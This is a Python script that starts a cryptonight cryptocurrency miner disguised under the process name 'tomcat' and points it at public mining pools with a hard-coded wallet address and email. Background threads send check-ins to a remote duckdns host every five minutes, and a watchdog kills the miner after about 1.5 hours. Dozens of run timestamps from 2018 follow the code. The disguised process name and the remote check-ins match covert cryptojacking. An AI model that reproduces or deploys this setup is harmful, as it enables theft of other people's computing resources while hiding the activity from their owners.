import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:48:06.191503
#2018-02-17 16:36:06.264169
#2018-02-17 18:24:03.555205
#2018-02-17 20:12:03.379521
#2018-02-17 21:59:06.480062
#2018-02-17 23:44:06.796894
#2018-02-18 01:33:01.507567
#2018-02-18 03:19:06.781362
#2018-02-18 05:08:05.484843
#2018-02-18 06:59:03.627211
#2018-02-18 08:46:07.735576
#2018-02-18 10:33:01.920539
#2018-02-18 12:18:06.230036
#2018-02-18 14:05:04.085517
#2018-02-18 15:55:03.935146
#2018-02-18 17:44:06.668659
#2018-02-18 19:31:03.681731
#2018-02-18 21:16:04.984489
#2018-02-18 23:03:03.541826
#2018-02-19 00:50:05.253217
#2018-02-19 02:37:05.383964
#2018-02-19 04:23:04.259433
#2018-02-19 06:08:04.581111
#2018-02-19 07:56:03.900934
#2018-02-19 09:47:06.672689
#2018-02-19 11:35:08.004259
#2018-02-19 13:23:04.768181
#2018-02-19 15:10:10.280237
#2018-02-19 16:59:04.570681
#2018-02-19 18:47:04.791604
#2018-02-19 20:37:01.260815
#2018-02-19 22:23:01.604360
#2018-02-20 00:09:04.242395
#2018-02-20 01:56:05.779713
#2018-02-20 03:47:03.897465
#2018-02-20 05:32:05.299104
#2018-02-20 07:16:07.165697
#2018-02-20 09:02:06.678526
#2018-02-20 10:46:07.629828
#2018-02-20 12:33:06.320237
#2018-02-20 14:18:06.065251
#2018-02-20 16:03:01.503155
#2018-02-20 17:49:04.380177
#2018-02-20 19:40:07.827615
#2018-02-20 21:27:04.295809
#2018-02-20 23:10:08.209438
#2018-02-21 00:55:08.870170
#2018-02-21 02:43:01.952432
#2018-02-21 04:31:07.259461
#2018-02-21 06:18:05.374204
#2018-02-21 08:04:06.109269
#2018-02-21 09:50:03.731685
#2018-02-21 11:38:06.462376
#2018-02-21 13:29:04.418028
#2018-02-21 15:16:02.119954
#2018-02-21 17:06:07.604485
#2018-02-21 18:53:07.653491
#2018-02-21 20:44:01.379614
#2018-02-21 22:28:07.226104
#2018-02-22 00:19:06.249333
#2018-02-22 02:06:08.100593
#2018-02-22 03:53:06.424079
#2018-02-22 05:41:06.794517
#2018-02-22 07:27:01.483462
#2018-02-22 09:14:05.806117
#2018-02-22 11:02:05.599363
#2018-02-22 12:50:08.168559
#2018-02-22 14:38:05.604509
#2018-02-22 16:24:08.460247
#2018-02-22 18:12:07.661016
#2018-02-22 20:03:06.071169
#2018-02-22 21:52:09.216815
#2018-02-22 23:39:08.134416
#2018-02-23 01:27:05.992989
#2018-02-23 03:13:07.228658
#2018-02-23 04:59:06.156077
#2018-02-23 06:44:05.645363
#2018-02-23 08:36:05.860192
#2018-02-23 10:51:06.015806
#2018-02-23 12:49:02.194649
#2018-02-23 14:33:06.388895
#2018-02-23 16:23:09.317689
#2018-02-23 18:10:09.727406
#2018-02-23 19:56:05.062547
#2018-02-23 21:41:03.635173
#2018-02-23 23:35:01.628530
#2018-02-24 01:23:07.571806
#2018-02-24 03:15:06.803177
#2018-02-24 05:02:04.884695
#2018-02-24 06:52:04.884775
#2018-02-24 08:42:07.657853
#2018-02-24 10:26:05.225319
#2018-02-24 12:21:05.216990
#2018-02-24 14:14:06.540211
#2018-02-24 16:01:03.683036
#2018-02-24 17:55:03.825035
#2018-02-24 19:42:05.488555
#2018-02-24 21:28:05.517919
#2018-02-25 01:58:05.292599
#2018-02-25 05:49:04.970208
#2018-02-25 11:37:07.612605